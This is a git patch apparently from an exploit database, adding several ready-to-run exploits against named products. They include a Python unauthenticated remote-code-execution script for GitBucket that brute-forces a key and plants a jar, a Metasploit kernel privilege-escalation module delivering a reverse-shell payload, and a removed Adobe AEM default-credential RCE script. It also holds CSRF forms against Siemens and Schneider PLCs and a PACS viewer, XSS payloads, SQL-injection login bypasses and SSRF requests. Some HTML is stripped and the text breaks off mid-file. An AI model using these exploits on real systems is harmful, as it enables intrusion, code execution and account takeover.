From 08c35595edb02c96567d09382f3d1593308317f9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 22 May 2018 05:01:47 +0000
Subject: [PATCH] DB: 2018-05-22

23 changes to exploits/shellcodes

Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)
R 3.4.4 - Local Buffer Overflow (DEP Bypass)
KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection
Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution
Superfood 1.0 - Multiple Vulnerabilities
Private Message PHP Script 2.0 - Persistent Cross-Site Scripting
Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Zenar Content Management System - Cross-Site Scripting
GitBucket 4.23.1 - Remote Code Execution
ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting
Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery
Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery
Teradek Cube 7.3.6 - Cross-Site Request Forgery
Teradek Slice 7.3.15 - Cross-Site Request Forgery
Schneider Electric PLCs - Cross-Site Request Forgery
Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass
Merge PACS 7.0 - Cross-Site Request Forgery
Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass
Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting
---
 exploits/hardware/webapps/44671.html | 53 ++++++
 exploits/hardware/webapps/44672.txt | 118 ++++++++++++++
 exploits/hardware/webapps/44675.html | 50 ++++++
 exploits/hardware/webapps/44676.html | 48 ++++++
 exploits/java/webapps/44666.txt | 35 ++++
 exploits/java/webapps/44668.py | 171 ++++++++++++++++++++
 exploits/jsp/webapps/44659.py | 56 -------
 exploits/linux/local/44677.rb | 187 ++++++++++++++++++++++
 exploits/linux/webapps/44667.txt | 15 ++
 exploits/linux/webapps/44681.txt | 39
+++++ exploits/php/webapps/44661.txt | 57 +++++++ exploits/php/webapps/44662.txt | 18 +++ exploits/php/webapps/44663.txt | 34 ++++ exploits/php/webapps/44664.txt | 41 +++++ exploits/php/webapps/44679.txt | 52 ++++++ exploits/php/webapps/44682.txt | 56 +++++++ exploits/php/webapps/44683.txt | 12 ++ exploits/windows/webapps/44678.txt | 103 ++++++++++++ exploits/windows_x86/local/44680.py | 132 +++++++++++++++ exploits/{linux => xml}/webapps/44430.txt | 0 files_exploits.csv | 21 ++- 21 files changed, 1240 insertions(+), 58 deletions(-) create mode 100644 exploits/hardware/webapps/44671.html create mode 100644 exploits/hardware/webapps/44672.txt create mode 100644 exploits/hardware/webapps/44675.html create mode 100644 exploits/hardware/webapps/44676.html create mode 100644 exploits/java/webapps/44666.txt create mode 100755 exploits/java/webapps/44668.py delete mode 100755 exploits/jsp/webapps/44659.py create mode 100755 exploits/linux/local/44677.rb create mode 100644 exploits/linux/webapps/44667.txt create mode 100644 exploits/linux/webapps/44681.txt create mode 100644 exploits/php/webapps/44661.txt create mode 100644 exploits/php/webapps/44662.txt create mode 100644 exploits/php/webapps/44663.txt create mode 100644 exploits/php/webapps/44664.txt create mode 100644 exploits/php/webapps/44679.txt create mode 100644 exploits/php/webapps/44682.txt create mode 100644 exploits/php/webapps/44683.txt create mode 100644 exploits/windows/webapps/44678.txt create mode 100755 exploits/windows_x86/local/44680.py rename exploits/{linux => xml}/webapps/44430.txt (100%) diff --git a/exploits/hardware/webapps/44671.html b/exploits/hardware/webapps/44671.html new file mode 100644 index 000000000..157d82062 --- /dev/null +++ b/exploits/hardware/webapps/44671.html @@ -0,0 +1,53 @@ + + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44672.txt b/exploits/hardware/webapps/44672.txt new file mode 100644 index 000000000..53fb392d7 --- /dev/null +++ b/exploits/hardware/webapps/44672.txt 
@@ -0,0 +1,118 @@ +Teradek VidiU Pro 3.0.3 SSRF Vulnerability + + +Vendor: Teradek, LLC +Product web page: https://www.teradek.com +Affected version: VidiU, VidiU Mini, VidiU Pro + 3.0.3r32136 + 3.0.2r31225 + 2.4.10 + +Summary: The Teradek VidiU gives you the freedom to broadcast live +high definition video directly to the Web without a PC. Whether you're +streaming out of a video switcher or wirelessly from your camera, +VidiU allows you to go live when you want, where you want. VidiU +offers API level integration with the Ustream, YouTube Live and +Livestream platforms, which makes streaming to your channel as +easy as logging into your account. + +Desc: A server-side request forgery (SSRF) vulnerability exists in +the VidiU management interface within the RTMP settings and the Wowza +server mode functionality. The application parses user supplied data +in the GET parameters 'url' and 'xml_url' to construct a page request +that loads the configuration for specific service. Since no validation +is carried out on the parameters, an attacker can specify an external +domain and force the application to make a HTTP request to an arbitrary +destination host, including xml data parsing (XXE potential). This can +be used by an external attacker for example to bypass firewalls and +initiate a service and network enumeration on the internal network +through the affected application. 
+ +Tested on: lighttpd/1.4.48 + lighttpd/1.4.31 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2018-5461 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php + + +02.03.2018 + +-- + + +SSRF open port: +--------------- + +GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:443&_=1526243349301 HTTP/1.1 +Host: 127.0.0.1:8090 + + +HTTP/1.1 200 OK +Content-Type: application/json +Connection: close +Date: Sun, 13 May 2018 21:42:30 GMT +Server: lighttpd/1.4.31 +Content-Length: 31 + +{"error":"invalid parameters"} + + +SSRF closed port: +----------------- + +GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:7777&_=1526243349301 HTTP/1.1 +Host: 127.0.0.1:8090 + + +HTTP/1.1 200 OK +Content-Length: 0 +Connection: close +Date: Sun, 13 May 2018 21:43:30 GMT +Server: lighttpd/1.4.31 + + +=================================================== + + +SSRF closed port: +----------------- + +GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:7777&_=1526244218671 HTTP/1.1 +Host: 127.0.0.1:8090 + + +{"result":"error", "error":"Curl error"} + + +SSRF open port: +--------------- + +GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:443&_=1526244218671 HTTP/1.1 +Host: 127.0.0.1:8090 + + +{"result":"error", "error":"Bad request"} + + +=================================================== + + +PoC CSRF Blind XXE SSRF OOB: +---------------------------- + + + +
+ + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44675.html b/exploits/hardware/webapps/44675.html new file mode 100644 index 000000000..f8afecad5 --- /dev/null +++ b/exploits/hardware/webapps/44675.html @@ -0,0 +1,50 @@ + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/44676.html b/exploits/hardware/webapps/44676.html new file mode 100644 index 000000000..44ad6f96a --- /dev/null +++ b/exploits/hardware/webapps/44676.html @@ -0,0 +1,48 @@ + + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/java/webapps/44666.txt b/exploits/java/webapps/44666.txt new file mode 100644 index 000000000..294828581 --- /dev/null +++ b/exploits/java/webapps/44666.txt @@ -0,0 +1,35 @@ +# Exploit Title: ManageEngine Recovery Manager Plus 5.3 (Build 5330) - Persistent Cross-Site Scripting +# Dated: 2018-03-31 +# Exploit Author: Ahmet GÜREL +# Software Link: https://www.manageengine.com/ad-recovery-manager/ +# Version: < = 5.3 (Build 5330) +# Platform: Java +# Tested on: Windows +# CVE: CVE-2018-9163 + +# 1. DETAILS +# In the Add New Technician (s) section on the /admin/technicians page of the +# ManageEngine Recovery Manager Plus 5.3 (Build 5330) application, allows +# remote authenticated users with the Login Name parameter is vulnerable to +# XSS. The parameters entered are written in the database and affect all +# users. + +# 2. PoC: +# From the Add New Technician (s) page, it is possible to inject malicious +# web code inside Login Name parameter. The HTTP request looks like the following: + +GET +/technicianAction.do?req={%22domainId%22:0,%22loginName%22:%22%3Csvg%20onload%3Dprompt(document.domain)%3E%22,%22password%22:%22Test123%22,%22isDomainUser%22:false,%22roleId%22:1,%22operation%22:%22createTechnicians%22} +HTTP/1.1 +Host: 172.16.219.168:8090 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) +Gecko/20100101 Firefox/59.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://172.16.219.168:8090/ +Content-Type: application/json; charset=utf-8 +X-Requested-With: XMLHttpRequest +Cookie: JSESSIONIDRMP=64556C394C0687AA34179CFE2EF4EA5A; +JSESSIONIDSSO=0605E8EB825B181A4A201542A518457D +Connection: close \ No newline at end of file diff --git a/exploits/java/webapps/44668.py b/exploits/java/webapps/44668.py new file mode 100755 index 000000000..05313de7f --- /dev/null 
+++ b/exploits/java/webapps/44668.py 
@@ -0,0 +1,171 @@ +# Exploit Title: GitBucket 4.23.1 Unauthenticated RCE +# Date: 21-05-2018 +# Software Link: https://github.com/gitbucket/gitbucket +# Exploit Author: Kacper Szurek +# Contact: https://twitter.com/KacperSzurek +# Website: https://security.szurek.pl/ +# Category: remote + +1. Description + +Abusing weak secret token and passing insecure parameter to File function. + +2. Proof of Concept + +import os +try: + from Crypto.Cipher import Blowfish +except: + print "pip install pycrypto" + os._exit(0) + +import binascii +import base64 +import urllib2 +import urllib +import time +import sys +import pickle + +print "GitBucket 4.23.1 Unauthenticated RCE" +print "by Kacper Szurek" +print "https://security.szurek.pl/" + +print "Working only when server is installed on Windows" + +def PKCS5Padding(string): + byteNum = len(string) + packingLength = 8 - byteNum % 8 + appendage = chr(packingLength) * packingLength + return string + appendage + +def encrypt(content, key): + content = PKCS5Padding(content) + cipher = Blowfish.new(key, Blowfish.MODE_ECB) + return base64.b64encode(cipher.encrypt(content)) + +def get_file(git_bucket_url, file, key, expiration_time): + payload = "{} {}".format(expiration_time, file) + authorization = encrypt(payload, key) + url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file) + + try: + request = urllib2.Request(url) + request.add_header("Authorization", authorization) + result = urllib2.urlopen(request).read() + return result + + except Exception, e: + # If payload is correct and file does not exist, we got error 400 + if not "Error 500" in e.read(): + return 'OK' + +def put_file(git_bucket_url, file, key, expiration_time, content): + payload = "{} {}".format(expiration_time, file) + authorization = encrypt(payload, key) + url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file) + + try: + request = urllib2.Request(url, data=content) + request.add_header("Authorization", authorization) + request.get_method = lambda: 'PUT' + result 
= urllib2.urlopen(request) + return result.getcode() == 200 + + except Exception, e: + return None + +def send_command(git_bucket_url, command): + try: + result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read() + return result + except: + return None + +def pickle_key(url, key): + output = open(pickle_path, "wb") + pickle.dump({'url' : url, 'key' : key}, output) + output.close() + print "[+] Key pickled for futher use" + + +def unpickle_key(url): + if os.path.isfile(pickle_path): + pickled_file = open(pickle_path, "rb") + data = pickle.load(pickled_file) + pickled_file.close() + if data['url'] == url: + return data['key'] + return None + +if len(sys.argv) != 3: + print "[-] Usage: exploit.py url command" + os._exit(0) + + +exploit_jar = 'exploit.jar' +url = sys.argv[1] +command = sys.argv[2] +pickle_path = 'gitbucket.pickle' + +if url.endswith('/'): + url = url[0:-1] + +try: + is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read() +except: + is_gitbucket = "" + +if not is_gitbucket.startswith('{"rate_limit_url"'): + print "[-] Probably not gitbucket url: {}".format(url) + os._exit(0) + +if not os.path.isfile(exploit_jar): + print "[-] Missing exploit file: {}".format(exploit_jar) + os._exit(0) + +expiration_time = int(round(time.time() * 1000))+(1000*6000) +print "[+] Set expire time to: {}".format(expiration_time) + +print "[+] Start search blowfish key: " +for i in range(0, 10000): + if i % 100 == 0: + print "+", + + potential_key = unpickle_key(url) + if potential_key: + print "\n[+] Unpickle key, try it" + else: + potential_key = str(i).zfill(4) + + config_path = "non_existing_file" + config_content = get_file(url, config_path, potential_key, expiration_time) + if config_content: + print "\n[+] Found blowfish key: {}".format(potential_key) + print "[+] Config content:\n{}".format(config_content) + + exploit_path = "..\..\..\..\plugins\exploit.jar" + f = open(exploit_jar, "rb") + 
exploit_content = f.read() + f.close() + if put_file(url, exploit_path, potential_key, expiration_time, exploit_content): + print "[+] Wait few second for plugin load" + time.sleep(5) + command_content = send_command(url, "cmd /c {}".format(command)) + + if command_content: + pickle_key(url, potential_key) + print command_content + else: + print "[-] Cannot execute command" + + else: + print "[-] Cannot upload exploit.jar" + + os._exit(0) + +3. Solution: + +Update to version 4.24.1 + +https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war \ No newline at end of file diff --git a/exploits/jsp/webapps/44659.py b/exploits/jsp/webapps/44659.py deleted file mode 100755 index 25547dc5f..000000000 --- a/exploits/jsp/webapps/44659.py +++ /dev/null 
@@ -1,56 +0,0 @@ -# Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE -# Date: 5/19/18 -# Exploit Author: StaticFlow -# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html -# Version: < 6.3 -import requests -import sys - -baseUrl = 'https://test.com/' #default domain, change here or pass in on command line -credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']] -exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line - -def testLogins(): - for credential in credentialList: - response = requests.get(baseUrl, auth=(credential[0], credential[1])) - if(response.status_code == 200): - return credential - return False - -if len(sys.argv) == 2: - baseUrl = sys.argv[1] -if len(sys.argv) == 3: - exploit = sys.argv[2] - -gotCreds = testLogins() -if(gotCreds): - attackChain = [ - { - 'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit - }, - { - 'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit - }, - { - ':operation': (None, 'copy'), #copy exploit folder over to app folder for staging - ':dest': (None, '/apps/rcetype') - }, - { - 'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet - } - ] - print "creating folder structure and uploading exploit" - for attack in attackChain[:-1]: - response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1])) - if response.status_code > 201: - print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:" - print response.content - sys.exit(0) - - print "initializing servlet from exploit" - response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1])) - if response.status_code > 201: - print "Something went wrong, request returned a "+str(response.status_code)+". 
Here's the response:" - print response.content - sys.exit(0) - print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec') \ No newline at end of file diff --git a/exploits/linux/local/44677.rb b/exploits/linux/local/44677.rb new file mode 100755 index 000000000..a672bb5bf --- /dev/null +++ b/exploits/linux/local/44677.rb 
@@ -0,0 +1,187 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation', + 'Description' => %q{ + This module exploits a vulnerability in the rds_page_copy_user function + in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8 + to execute code as root (CVE-2010-3904). + + This module has been tested successfully on Fedora 13 (i686) with + kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64) + with kernel version 2.6.32-21-generic. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Dan Rosenberg', # Discovery and C exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Oct 20 2010', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'AKA', 'rds-fail.c' ], + [ 'EDB', '15285' ], + [ 'CVE', '2010-3904' ], + [ 'BID', '44219' ], + [ 'URL', 'https://securitytracker.com/id?1024613' ], + [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ], + [ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ], + [ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ], + [ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ], + ], + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', + 'WfsDelay' => 10, + 'PrependFork' 
=> true + }, + 'DefaultTarget' => 0)) + register_options [ + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def modules_disabled? + modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip + (modules_disabled.eql?('1') || modules_disabled.eql?('2')) + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def upload_and_compile(path, data) + upload "#{path}.c", data + output = cmd_exec "gcc -o #{path} #{path}.c" + + unless output.blank? + print_error output + fail_with Failure::Unknown, "#{path}.c failed to compile" + end + + cmd_exec "chmod +x #{path}" + register_file_for_cleanup path + end + + def exploit_data(file) + path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file + fd = ::File.open path, 'rb' + data = fd.read fd.stat.size + fd.close + data + end + + def live_compile? + return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + + if has_gcc? + vprint_good 'gcc is installed' + return true + end + + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + + def check + version = kernel_release + unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') && + Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37') + vprint_error "Linux kernel version #{version} is not vulnerable" + return CheckCode::Safe + end + vprint_good "Linux kernel version #{version} appears to be vulnerable" + + unless cmd_exec('/sbin/modinfo rds').to_s.include? 
'Reliable Datagram Sockets' + vprint_error 'RDS kernel module is not available' + return CheckCode::Safe + end + vprint_good 'RDS kernel module is available' + + if modules_disabled? + unless cmd_exec('/sbin/lsmod').to_s.include? 'rds' + vprint_error 'RDS kernel module is not loadable' + return CheckCode::Safe + end + end + vprint_good 'RDS kernel module is loadable' + + CheckCode::Appears + end + + def exploit + unless check == CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + # Upload exploit executable + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile executable_path, exploit_data('rds-fail.c') + else + vprint_status 'Dropping pre-compiled exploit on system...' + arch = kernel_hardware + case arch + when /amd64|ia64|x86_64|x64/i + upload_and_chmodx executable_path, exploit_data('rds-fail.x64') + when /x86|i[3456]86/ + upload_and_chmodx executable_path, exploit_data('rds-fail.x86') + else + fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}" + end + end + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Launch exploit + print_status 'Launching exploit...' + output = cmd_exec "#{executable_path} #{payload_path}" + output.each_line { |line| vprint_status line.chomp } + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/44667.txt b/exploits/linux/webapps/44667.txt new file mode 100644 index 000000000..45e8e0045 --- /dev/null 
+++ b/exploits/linux/webapps/44667.txt @@ -0,0 +1,15 @@ +# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery +# Google Dork: inurl:/Portal/Portal.mwsl +# Date: 2018-05-21 +# Exploit Author: t4rkd3vilz, Jameel Nabbo +# Vendor Homepage: https://www.siemens.com/ +# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3 +# Tested on: Kali Linux +# CVE: CVE-2015- 5698 + +# 1. Proof of Concept + +
+ + +
\ No newline at end of file diff --git a/exploits/linux/webapps/44681.txt b/exploits/linux/webapps/44681.txt new file mode 100644 index 000000000..4dd7c045b --- /dev/null +++ b/exploits/linux/webapps/44681.txt @@ -0,0 +1,39 @@ +# Exploit Title: Merge PACS 7.0 - Cross-Site Request Forgery +# Google Dork: - +# Date: 2018-05-21 +# Exploit Author: Safak Aslan +# Vendor Homepage: http://www.merge.com/ +# Version: Merge PACS 7.0 +# Tested on: Windows +# CVE: - + +# 1. Proof of Concept + + + + +
+ + + + +
+ + + +Post Data: + +POST /servlet/actions/merge-viewer/summary HTTP/1.1 +Host: targetIP +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3 +Accept-Encoding: gzip, deflate +Referer: https://targetIP/servlet/actions/merge-viewer/login?redirectTo=https%3A%2F%2FtargetIP%2Fservlet%2Factions%2Fmerge-viewer%2Fsummary +Content-Type: application/x-www-form-urlencoded +Content-Length: 55 +Cookie: JSESSIONID=6846606B53045FE6474A57C71719C93D +Connection: close +Upgrade-Insecure-Requests: 1 + +amicasUsername=merge&password=viewer&submitButton=Login \ No newline at end of file diff --git a/exploits/php/webapps/44661.txt b/exploits/php/webapps/44661.txt new file mode 100644 index 000000000..2cd1810c1 --- /dev/null +++ b/exploits/php/webapps/44661.txt @@ -0,0 +1,57 @@ +# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass +# Date: 2018-05-20 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30 +# Version: 1.0 +# Tested on: Kali linux +==================================================== +# Description: +Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities : +==================================================== +# POC 1 : Persistent cross site scripting : +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will have an alert box in the page . +==================================================== +# POC 2 : CSRF : +Attacker can change user's authentication directly : +# User's CSRF exploit : + + + CSRF POC + + +
+ + + +
+ + + + +# Admin page CSRF exploit : + +
+ + + + + + +
+ +==================================================== +# POC 3 : Authentication bypass : +# Attacker can bypass admin panel without any authentication : +Path : /admin +Username : ' or 0=0 # +Password : anything +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44662.txt b/exploits/php/webapps/44662.txt new file mode 100644 index 000000000..b45886e7c --- /dev/null +++ b/exploits/php/webapps/44662.txt @@ -0,0 +1,18 @@ +# Exploit Title: Private Message PHP Script 2.0 - Persistent Cross-Site scripting +# Date: 2018-05-20 +# Exploit Author: Borna nematzadeh (L0RD) +# Vendor Homepage: https://codecanyon.net/item/private-message-php-script/21027192?s_rank=1 +# Version: 2.0 +# Tested on: Windows + +# Description : +Private Message PHP Script 2.0 suffers from persistent cross site scripting. +You can put your malicious javascript payload . +When target opens your massege , payload will be executed before self destruction . + +# POC : +1) Put this payload into textarea and click submit : + + +2) You will get a link which your javascript code is inside this link . You can send this link to anyone . +3) After clicking on "show me the message" , payload will be executed . \ No newline at end of file diff --git a/exploits/php/webapps/44663.txt b/exploits/php/webapps/44663.txt new file mode 100644 index 000000000..b8f1fd524 --- /dev/null +++ b/exploits/php/webapps/44663.txt 
@@ -0,0 +1,34 @@ +# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery +# Date: 2018-05-20 +# Dork: N/A +# Exploit Author: borna nematzadeh (L0RD) +# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630 +# Version: 1.1.0 +# Tested on: Kali linux + +# POC 1 : Persistent Cross site scripting : +1) After creating an account , navigate to "Edit profile" . +2) Put this payload into the "Birthday" and save changes : +" onmouseover=alert(document.cookie) " +3) You will have an alert box in the page . + +# POC 2 : Cross site request forgery : + + + + CSRF POC + + +
+ + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44664.txt b/exploits/php/webapps/44664.txt new file mode 100644 index 000000000..119a8d5f5 --- /dev/null +++ b/exploits/php/webapps/44664.txt @@ -0,0 +1,41 @@ +# Exploit Title: Zenar Content Management System - Cross-Site Scripting +# Software Link: https://zenar.io/ +# Dork: N/A +# Author: Berk Dusunur +# Tested Website: http://demo.zenar.io +# Date: 2018-05-20 +# Category: Web App + +# PoC + +# GET Request: + +POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1 +Host: demo.zenar.io +Cache-Control: no-cache +Connection: Keep-Alive +Accept: text/plain, */*; q=0.01 +Origin: http://demo.zenar.io +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 +X-Requested-With: XMLHttpRequest +Referer: http://demo.zenar.io/enquiries/newsletter-sign-up +Accept-Language: en-us,en;q=0.5 +X-Scanner: Netsparker +Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33 +Accept-Encoding: gzip, deflate +Content-Length: 273 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com¤t_page='"--> + +# Response: + +
" +class="page_">
\ No newline at end of file diff --git a/exploits/php/webapps/44679.txt b/exploits/php/webapps/44679.txt new file mode 100644 index 000000000..d481b4429 --- /dev/null +++ b/exploits/php/webapps/44679.txt @@ -0,0 +1,52 @@ +# Exploit Title: Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass +# Date: 2018-05-21 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28 +# Version: 1.0 +# Tested on: Kali linux + +# Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities: + +# POC 1 : Persistent cross site scripting : +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will have an alert box in the page . + +# POC 2 : CSRF : +# Attacker can change user's authentication directly : +# User's CSRF exploit : + + + CSRF POC + + +
+ + + +
+ + + + +# Admin page CSRF exploit : + +
+ + + + + + +
+ + +# POC 3 : Authentication bypass : +Path : /admin +Username : ' or 0=0 # +Password : anything \ No newline at end of file diff --git a/exploits/php/webapps/44682.txt b/exploits/php/webapps/44682.txt new file mode 100644 index 000000000..2296eb06c --- /dev/null +++ b/exploits/php/webapps/44682.txt @@ -0,0 +1,56 @@ +# Exploit Title: Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication bypass +# Date: 2018-05-21 +# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com +# Vendor Homepage: https://codecanyon.net/item/model-agency-media-house-model-gallery/16927610?s_rank=29 +# Version: 1.0 +# Tested on: Kali linux + +# Description: +#Model Agency - Media House & Model Gallery 1.0 suffers from multiple vulnerabilities : + +# POC 1 : Persistent cross site scripting : +1) After creating an account , go to your profile. +2) Navigate to "Update profile" and put this payload : +"/> +3) You will have an alert box in the page . + +# POC 2 : CSRF : cross site request forgery : + +# User's CSRF exploit : + + + CSRF POC + + +
+ + + +
+ + + + +# Admin page CSRF exploit : + +
+ + + + + + +
